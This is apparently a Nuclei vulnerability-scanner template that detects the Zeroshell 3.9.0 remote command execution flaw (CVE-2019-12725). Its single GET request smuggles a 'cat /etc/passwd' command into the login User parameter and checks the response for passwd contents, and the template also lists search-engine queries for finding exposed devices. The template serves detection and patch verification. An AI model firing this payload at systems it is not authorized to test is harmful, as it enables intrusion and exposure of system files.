id: CVE-2019-12725

info:
  name: Zeroshell 3.9.0 - Remote Command Execution
  author: dwisiswant0,akincibor
  severity: critical
  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
  reference:
    - https://www.zeroshell.org/new-release-and-critical-vulnerability/
    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
    - https://zeroshell.org/blog/
    - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-12725
    cwe-id: CWE-78
    epss-score: 0.94138
    epss-percentile: 0.99917
    cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
    shodan-query: http.title:"zeroshell"
    fofa-query: title="zeroshell"
    google-query: intitle:"zeroshell"
  tags: cve,cve2019,packetstorm,rce,zeroshell,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220710a7675238fd7a49f17e688cf23145b6d41080453115cf548cb92da0a17639e022100f5f018f1c1fd8223784e75f986e43b3316fb8589b85a239883af6410d756d063:922c64590222798bb761d5b6d8e72950